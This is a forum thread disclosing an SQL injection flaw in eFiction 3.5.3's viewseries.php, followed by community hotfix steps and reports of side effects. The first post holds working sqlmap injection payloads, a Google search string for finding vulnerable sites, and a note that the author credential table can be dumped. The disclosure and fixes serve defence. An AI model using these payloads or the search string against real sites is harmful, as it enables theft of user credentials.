Author Topic: SQL Injection vulnerability in eFiction  (Read 8602 times)

robert

SQL Injection vulnerability in eFiction
« on: November 13, 2014, 12:46:24 AM »
Hello ...

The viewseries.php page in eFiction 3.5.3 is vulnerable to an SQL Injection attack.
The page loads the URL parameter "seriesid":

     $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

Then it passes the *tainted* value directly down to the database:

     $parents = dbquery("SELECT s.title, s.seriesid FROM ".TABLEPREFIX."fanfiction_inseries as i,
     ".TABLEPREFIX."fanfiction_series as s WHERE s.seriesid = i.seriesid AND i.subseriesid = '$seriesid'");

This allows an attacker to extract information from the underlying database.

     sqlmap identified the following injection points with a total of 396 HTTP(s) requests:
     ---
     Place: GET
     Parameter: seriesid
         Type: boolean-based blind
         Title: AND boolean-based blind - WHERE or HAVING clause
         Payload: seriesid=1' AND 9530=9530 AND 'xaMV'='xaMV

         Type: error-based
         Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause
         Payload: seriesid=-1947' OR ROW(2257,7329)>(SELECT COUNT(*),CONCAT(0x716e656e71,(SELECT (CASE WHEN (2257=2257) THEN 1 ELSE 0 END)),0x716c746b71,FLOOR(RAND(0)*2))x FROM (SELECT 7852 UNION SELECT 4197 UNION SELECT 3571 UNION SELECT 7903)a GROUP BY x) AND 'zplx'='zplx

         Type: AND/OR time-based blind
         Title: MySQL > 5.0.11 AND time-based blind
         Payload: seriesid=1' AND SLEEP(5) AND 'hXxL'='hXxL
     ---
     [20:37:41] [INFO] testing MySQL
     [20:37:42] [INFO] confirming MySQL
     [20:37:45] [INFO] the back-end DBMS is MySQL
     [20:37:45] [INFO] fetching banner
     [20:37:45] [INFO] retrieving the length of query output
     [20:37:45] [INFO] retrieved: 20
     [20:38:25] [INFO] retrieved: 5.1.69-community-log
     [20:38:25] [INFO] actively fingerprinting MySQL
     [20:38:28] [INFO] executing MySQL comment injection fingerprint
     web application technology: Apache, PHP 5.2.17
     back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
               banner parsing fingerprint: MySQL 5.1.69, logging enabled
     banner:    '5.1.69-community-log'

Vulnerable sites can be found using Google by executing this search:

     inurl:"viewseries.php?seriesid="

The complete list of usernames/passwords can be obtained by dumping the fanfiction_authors table.

Anybody running eFiction 3.5.3 should be advised that their user credentials are available to the public.

 ... Robert
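A hardened version of the lookup described above, as an added example (not code from eFiction 3.5.3 or from the hotfix in this thread): the URL value is checked to be digits only and bound through a mysqli prepared statement instead of being spliced into the SQL string. $dbconnect, TABLEPREFIX and the table names are the ones the thread's code uses; the function name parent_series_for and the prefix value 'efiction_' are assumptions.

```php
<?php
// Added example, not code from the eFiction package or the hotfix: the
// viewseries.php lookup with a strict integer check and a prepared statement.
// TABLEPREFIX and the table/column names follow the query quoted in the post.

if (!defined('TABLEPREFIX')) {
    define('TABLEPREFIX', 'efiction_'); // assumed prefix for this illustration
}

// Returns the parent series rows for a sub-series id as an array of
// array('title' => ..., 'seriesid' => ...), or false if the id is unusable.
// $raw is passed straight from $_GET['seriesid']; it may be missing or even
// an array (seriesid[]=1), so the type is checked before the value.
function parent_series_for(mysqli $dbconnect, $raw) {
    // Only a non-empty string of ASCII digits is accepted. This is stricter
    // than is_numeric(), which also passes forms such as "1e3" or " 1".
    if (!is_string($raw) || !ctype_digit($raw)) {
        return false;
    }
    $subseriesid = (int) $raw; // an int is also safe to echo into links

    $sql = 'SELECT s.title, s.seriesid'
         . ' FROM ' . TABLEPREFIX . 'fanfiction_inseries AS i, '
         . TABLEPREFIX . 'fanfiction_series AS s'
         . ' WHERE s.seriesid = i.seriesid AND i.subseriesid = ?';

    $stmt = $dbconnect->prepare($sql);
    if ($stmt === false) {
        // Log the driver error server side; never echo it to the visitor.
        error_log('viewseries prepare failed: ' . $dbconnect->error);
        return false;
    }
    // 'i' binds the placeholder as an integer; URL text never reaches the DB as SQL.
    $stmt->bind_param('i', $subseriesid);
    $stmt->execute();
    $stmt->bind_result($title, $seriesid);

    $parents = array();
    while ($stmt->fetch()) {
        $parents[] = array('title' => $title, 'seriesid' => $seriesid);
    }
    $stmt->close();
    return $parents;
}

// In viewseries.php the existing dbquery() call would become the line below;
// the rest of the page then loops over the returned array, not a result handle.
// $parents = parent_series_for($dbconnect, isset($_GET['seriesid']) ? $_GET['seriesid'] : '');
```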

Sheepcontrol

Re: SQL Injection vulnerability in eFiction
« Reply #1 on: November 13, 2014, 09:31:18 AM »
UPDATE: zip-archive attached with the modified files.

Thanks for letting us know, here's a fix, and YOU NEED TO DO THIS A.S.A.P.

Step 1:
Open includes/mysqli_functions.php, find:

     // Used to escape text being put into the database.
     function escapestring($str) {
         global $dbconnect;
         return $dbconnect->real_escape_string($str);
     }

Modify to:

     // Used to escape text being put into the database.
     function escapestring($str) {
         global $dbconnect;
         if (!is_array($str)) return $dbconnect->real_escape_string($str);
         return array_map('escapestring', $str);
     }

(You can skip step 2 if you know you are using the mysqli extension; if you are not sure, better do it.)
Step 2:
Open includes/mysql_functions.php, find at or around line 56:

     // Used to escape text being put into the database.
     function escapestring($str) {
         if(version_compare(phpversion(),"4.3.0")=="-1") {
             $str = mysql_escape_string($str);
         } else {
             $str = mysql_real_escape_string($str);
         }
         return $str;
     }

Modify to:

     // Used to escape text being put into the database.
     function escapestring($str) {
         if (!is_array($str)) return mysql_real_escape_string($str);
         else return array_map('escapestring', $str);
     }

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

Step 3:
Completely scratched for breaking several forms.

Step 4:
Open viewseries.php, find around line 36:

     include(_BASEDIR."includes/pagesetup.php");


     $seriesid = isset($_GET['seriesid']) ? $_GET['seriesid'] : false;

change last line of above to:

     $seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

First tests indicate this is
1) working
2) fixing the injection issue
3) should work now

Update #1: Added viewseries.php as file to be modified
Update #2: Fixed a typo above, Step 1 hits includes/mysqli_functions.php, Step 2 goes for includes/mysql_functions.php
Update #3: Convenience fix, packed the affected files in a zip-archive, just unpack and upload, do not edit anything else.

I am sorry, this may seem a bit unorganized, and in fact it is, which has to do with the fact that I am not really into the 3.5.3 code, I merely took the project over with the intention of bringing it to version 5.0.0, which is underway, but not quite ready for release.

Updated package is postponed, also, until this fix has become somewhat stable.
« Last Edit: November 14, 2014, 08:16:17 PM by Sheepcontrol »
I speak the worlds most widely used language: bad english

Sheepcontrol

Re: SQL Injection vulnerability in eFiction
« Reply #2 on: November 13, 2014, 11:31:09 AM »
Ran a test: because $seriesid is used directly to build links, it still shows up as injected, but the actual DB query is safe.

kaehana

Re: SQL Injection vulnerability in eFiction
« Reply #3 on: November 13, 2014, 12:51:12 PM »
I did this change, but now when I click the submit button everything is OK, but when I want to echo the inserted text it shows "rn" between the lines (in the database it shows \r\n). I tried to remove these tags but they don't disappear. How could I remove these tags?

Purpleyin

Re: SQL Injection vulnerability in eFiction
« Reply #4 on: November 13, 2014, 12:54:04 PM »
(You can skip step 2 if you know you are using the mysqli extension; if you are not sure, better do it.)
Step 2:
Open includes/mysqli_functions.php, find at or around line 56:

     // Used to escape text being put into the database.
     function escapestring($str) {
         if(version_compare(phpversion(),"4.3.0")=="-1") {
             $str = mysql_escape_string($str);
         } else {
             $str = mysql_real_escape_string($str);
         }
         return $str;
     }

Modify to:

     // Used to escape text being put into the database.
     function escapestring($str) {
         if (!is_array($str)) return mysql_real_escape_string($str);
         else return array_map('escapestring', $str);
     }

This will no longer probe for PHP versions before 4.3.0, but honestly, this would mean your web server has not been updated since around 2003.

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so I was assuming there's a tiny typo in step 2, or am I wrong and my files are different than expected somehow?

Sheepcontrol

Re: SQL Injection vulnerability in eFiction
« Reply #5 on: November 13, 2014, 01:25:20 PM »

I couldn't find that code in includes/mysqli_functions.php but could in includes/mysql_functions.php, so I was assuming there's a tiny typo in step 2, or am I wrong and my files are different than expected somehow?

Yes, there was a typo in the instructions, Step 1 was mysqli, Step 2 mysql.
Thanks
« Last Edit: November 13, 2014, 01:50:48 PM by Sheepcontrol »

Sheepcontrol

Re: SQL Injection vulnerability in eFiction
« Reply #6 on: November 13, 2014, 01:26:31 PM »
I did this change, but now when I click the submit button everything is OK, but when I want to echo the inserted text it shows "rn" between the lines (in the database it shows \r\n). I tried to remove these tags but they don't disappear. How could I remove these tags?

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.
« Last Edit: November 13, 2014, 01:49:31 PM by Sheepcontrol »

kaehana

Re: SQL Injection vulnerability in eFiction
« Reply #7 on: November 13, 2014, 02:10:56 PM »

Holy Batman, fired a bit too far here ^^

I changed the instructions above, in short terms: changes in the config.php modification, edit an additional file.

Thank you, now it's ok.

Sheepcontrol

Re: SQL Injection vulnerability in eFiction
« Reply #8 on: November 13, 2014, 02:27:12 PM »
Thanks for the feedback, good to know.

darklight

Re: SQL Injection vulnerability in eFiction
« Reply #9 on: November 13, 2014, 03:39:17 PM »
Thank you for getting on this so quick!

kaehana

Re: SQL Injection vulnerability in eFiction
« Reply #10 on: November 13, 2014, 03:53:26 PM »
Series doesn't show with

     $seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get an error in line 39 of viewseries.php.

But it's ok if I use:

     $seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I don't know if it is ok to use this last code.
« Last Edit: November 13, 2014, 03:56:59 PM by kaehana »

Sheepcontrol

Re: SQL Injection vulnerability in eFiction
« Reply #11 on: November 13, 2014, 04:08:58 PM »
Series doesn't show with

     $seriesid = (isset($_GET['seriesid']) && is_numeric($_GET['seriesid'])) ? escapestring($_GET['seriesid']) : false;

I get an error in line 39 of viewseries.php.

But it's ok if I use:

     $seriesid = isset($_GET['seriesid']) && is_numeric($_GET['seriesid']) ? escapestring($_GET['seriesid']) : false;

I don't know if it is ok to use this last code.

Now I have no idea why that doesn't work for you, double checked with my test site and it's just fine there, but your version seems to be ok, too.

Sue

Re: SQL Injection vulnerability in eFiction
« Reply #12 on: November 13, 2014, 07:48:04 PM »
Whoa - thanks Robert for the quick spot and thanks Sheepie for the fix.

Charl

Re: SQL Injection vulnerability in eFiction
« Reply #13 on: November 13, 2014, 10:05:32 PM »
A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

Sheepcontrol

Re: SQL Injection vulnerability in eFiction
« Reply #14 on: November 14, 2014, 01:54:58 AM »
A quick search didn't find those lines of code in the files. There was similar code but not the same.

Please hurry up on the fixed version as at least I can upload that!

I copied the code from an original version of eFiction 3.5.3, so if your files did indeed differ, that's strange.
Anyway, couldn't sleep so made the hotfix, full package including a few other fixes that came up within the next days, got family festivities coming my way.

SJP

Re: SQL Injection vulnerability in eFiction
« Reply #15 on: November 14, 2014, 03:03:45 PM »
Thank you, Robert for pointing this out, and thank you, Sheepcontrol for working on the fix.

I wanted to point out that the 2 lines of code that were previously added to the config.php file, and now are listed for the dbfuctions.php file:

     $_GET = array_map('stripslashes', $_GET);
     $_POST = array_map('stripslashes', $_POST);

May help with the SQL injection issue, but they throw off some of the site functionality. A member of my site emailed me to let me know that when she was trying to add a challenge, the site wouldn't save the characters she was trying to tie to the challenge. I checked, and she was correct. It looks like any input that comes from a box where multiple options can be chosen is being disregarded (for ex. in the advanced search it won't use selected classtypes to include/exclude).
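A recursive version of those two lines, as an added example that is not part of the hotfix or of the eFiction code: it strips the same slashes but also descends into the nested arrays that multi-select fields (such as the challenge characters or the advanced-search classtypes) produce, which a flat array_map('stripslashes', ...) turns into NULL. The helper name stripslashes_deep and the sample form data are constructed for this illustration; it assumes PHP 5, where get_magic_quotes_gpc() still exists.

```php
<?php
// Added example, not from the eFiction package or the hotfix: a recursive
// replacement for the two array_map('stripslashes', ...) lines quoted above.
// Multi-select form fields arrive as nested arrays in $_GET/$_POST, and
// stripslashes() on an array returns NULL with a warning, which is why those
// fields were being dropped. Assumes PHP 5, where get_magic_quotes_gpc() exists.

// Strips slashes from a scalar, or from every leaf of a nested array.
function stripslashes_deep($value) {
    if (is_array($value)) {
        return array_map('stripslashes_deep', $value);
    }
    return is_string($value) ? stripslashes($value) : $value;
}

// Undo magic_quotes only when PHP actually added the slashes; with the option
// off, stripping would mangle legitimate backslashes in submitted text.
if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
    $_GET  = stripslashes_deep($_GET);
    $_POST = stripslashes_deep($_POST);
}

// Constructed sample shaped like a challenge form with a multi-select
// "characters" field, as it arrives with magic quotes on.
$sample = array(
    'title'      => "O\\'Brien\\'s challenge",
    'characters' => array('12', '15', "Q \\\"the omnipotent\\\""),
);
$clean = stripslashes_deep($sample);
// $clean['title'] is O'Brien's challenge and $clean['characters'] keeps all
// three entries, whereas array_map('stripslashes', $sample) would turn
// 'characters' into NULL and the selection would never reach the database.
```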

babaca

Re: SQL Injection vulnerability in eFiction
« Reply #16 on: November 14, 2014, 03:50:41 PM »
UPDATE: zip-archive attached with the modified files.


Updated package is postponed, also, until this fix has become somewhat stable.

Sheep, I think you are great to tackle this problem but I'm confused... is there an attachment on your post or not? I see a paperclip on the header like there is an attachment but I could find no link. I will attempt to manually alter my files, but if I do, will I screw something up? Seems like there are some unpredictable results.

******************************************
Mucking around in eFiction since circa 2001 (ver. 1.0)
Now running v.3

Sheepcontrol

Re: SQL Injection vulnerability in eFiction
« Reply #17 on: November 14, 2014, 08:08:38 PM »
Thank you, Robert for pointing this out, and thank you, Sheepcontrol for working on the fix.

I wanted to point out that the 2 lines of code that were previously added to the config.php file, and now are listed for the dbfuctions.php file:

     $_GET = array_map('stripslashes', $_GET);
     $_POST = array_map('stripslashes', $_POST);

May help with the SQL injection issue, but they throw off some of the site functionality. A member of my site emailed me to let me know that when she was trying to add a challenge, the site wouldn't save the characters she was trying to tie to the challenge. I checked, and she was correct. It looks like any input that comes from a box where multiple options can be chosen is being disregarded (for ex. in the advanced search it won't use selected classtypes to include/exclude).

Darn, that's what I was fearing. Well, as I said, I don't know the code very well, ok, scratch that as well - I need to finish v5 ASAP :(

babaca

Re: SQL Injection vulnerability in eFiction
« Reply #18 on: November 14, 2014, 08:13:27 PM »

Darn, that's what I was fearing. Well, as I said, I don't know the code very well, ok, scratch that as well - I need to finish v5 ASAP :(

Hey I'm ready to beta test v5 whenever you are ready.  :agree:
« Last Edit: November 14, 2014, 11:56:11 PM by babaca »

jetblack

Re: SQL Injection vulnerability in eFiction
« Reply #19 on: November 14, 2014, 10:51:09 PM »
I'm getting a bunch of reports from authors stating that "rn" is being added to each line since I applied the hotfix.  Here's an example:

http://www.adastrafanfic.com/viewstory.php?sid=2061&chapter=37

No matter what I do on the HTML editor side, I cannot remove those characters.  They persist over and over.

-- jb
Archive: Ad Astra Star Trek Fanfiction Archive
Version: 3.5.3
Skin: One of Kali's, but I'm not sure.  It's been heavily modded.
PHP: 5.0
MySQL: 5.5